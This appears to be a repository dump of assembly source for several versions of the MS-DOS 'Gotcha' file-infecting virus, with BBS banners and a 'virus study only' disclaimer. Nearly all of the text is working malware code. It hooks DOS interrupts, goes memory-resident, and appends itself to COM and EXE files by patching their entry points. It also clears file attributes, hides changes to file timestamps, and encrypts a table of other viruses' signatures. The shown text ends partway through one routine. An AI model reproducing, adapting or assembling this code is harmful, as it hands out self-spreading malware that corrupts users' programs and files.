mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

503
MSDOS/Virus.MSDOS.Unknown.gotcha17.asm Normal file
View File

@ -0,0 +1,503 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mcý',0
signature: db 'GOTCHA!',0 ;I have got you! :-)
oi21:
end:
cseg ends
end begin
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

397
MSDOS/Virus.MSDOS.Unknown.gotcha4.asm Normal file
View File

@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

576
MSDOS/Virus.MSDOS.Unknown.gotcha9.asm Normal file
View File

@ -0,0 +1,576 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
